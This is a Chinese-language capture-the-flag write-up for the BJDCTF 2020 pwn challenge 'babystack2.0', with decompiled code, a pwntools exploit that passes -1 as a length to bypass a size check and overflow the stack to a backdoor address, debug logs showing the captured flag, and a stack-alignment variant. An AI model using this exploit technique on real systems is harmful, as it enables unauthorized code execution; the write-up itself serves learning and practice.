文章详细描述了一个BJDCTF2020比赛中的pwn类挑战,涉及到程序的内存安全特性如NX和PIE,以及利用IDA进行分析。通过提供exploit代码,解释了如何远程交互并触发漏洞,最终获取目标机器的控制权。
[BJDCTF 2020]babystack2.0
桌面$ checksec pwn
[*] '/home/pwn/桌面/pwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
IDA
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[12]; // [rsp+0h] [rbp-10h] BYREF
size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
LODWORD(nbytes) = 0;
puts("**********************************");
puts("* Welcome to the BJDCTF! *");
puts("* And Welcome to the bin world! *");
puts("* Let's try to pwn the world! *");
puts("* Please told me u answer loudly!*");
puts("[+]Are u ready?");
puts("[+]Please input the length of your name:");
__isoc99_scanf("%d", &nbytes);
if ( (int)nbytes > 10 )
{
puts("Oops,u name is too long!");
exit(-1);
}
puts("[+]What's u name?");
read(0, buf, (unsigned int)nbytes);
return 0;
}
EXP
from pwn import *
io = remote('node4.anna.nssctf.cn',28593)
context(log_level = "debug", arch = "amd64")
#io = process("./pwn")
backdoor = 0x0400726
payload = b'a' * 0x18 + p64(backdoor)
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
io.interactive()
ERROR
error1
注意以下以下两句,要在后面加‘\n’,因为puts函数后面会加‘\n’
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
测试如下:
1、有加‘\n’
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
桌面$ python2 exp.py
[+] Opening connection to node4.anna.nssctf.cn on port 28593: Done
[DEBUG] Received 0x22 bytes:
'*' * 0x22
[DEBUG] Received 0xc6 bytes:
'\n'
'* Welcome to the BJDCTF! *\n'
'* And Welcome to the bin world! *\n'
"* Let's try to pwn the world! *\n"
'* Please told me u answer loudly!*\n'
'[+]Are u ready?\n'
'[+]Please input the length of your name:\n'
[DEBUG] Sent 0x3 bytes:
'-1\n'
[DEBUG] Received 0x11 bytes:
"[+]What's u name?"
[DEBUG] Received 0x1 bytes:
'\n'
[DEBUG] Sent 0x21 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
00000010 61 61 61 61 61 61 61 61 26 07 40 00 00 00 00 00 │aaaa│aaaa│&·@·│····│
00000020 0a │·│
00000021
[*] Switching to interactive mode
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x2d bytes:
'NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}\n'
NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}
2、无加‘\n’
io.sendlineafter('name:','-1')
io.sendlineafter('name?',payload)
桌面$ python2 exp.py
[+] Opening connection to node4.anna.nssctf.cn on port 28593: Done
[DEBUG] Received 0x22 bytes:
'*' * 0x22
[DEBUG] Received 0xc6 bytes:
'\n'
'* Welcome to the BJDCTF! *\n'
'* And Welcome to the bin world! *\n'
"* Let's try to pwn the world! *\n"
'* Please told me u answer loudly!*\n'
'[+]Are u ready?\n'
'[+]Please input the length of your name:\n'
[DEBUG] Sent 0x3 bytes:
'-1\n'
[DEBUG] Received 0x11 bytes:
"[+]What's u name?"
[DEBUG] Sent 0x21 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
00000010 61 61 61 61 61 61 61 61 26 07 40 00 00 00 00 00 │aaaa│aaaa│&·@·│····│
00000020 0a │·│
00000021
[*] Switching to interactive mode
[DEBUG] Received 0x1 bytes:
'\n'
<= 多出一空行,即puts后面的'\n'
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x2d bytes:
'NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}\n'
NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}
3、若是其他情况,则可能报错
io.sendlineafter('name:','-1')
io.sendlineafter('name?\n',payload)
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?',payload)
error2
注意题目是Ubuntu16,若本机是Ubuntu18要调试pwn文件要抬栈,不然会报错
exp修改为:
from pwn import *
#io = remote('node4.anna.nssctf.cn',28593)
context(log_level = "debug", arch = "amd64")
io = process("./pwn")
backdoor = 0x0400726
ret = 0x400827
# payload = b'a' * 0x18 + p64(backdoor)
payload = b'a' * 0x18 + p64(ret) + p64(backdoor)
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
io.interactive()
扫一扫
1098
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
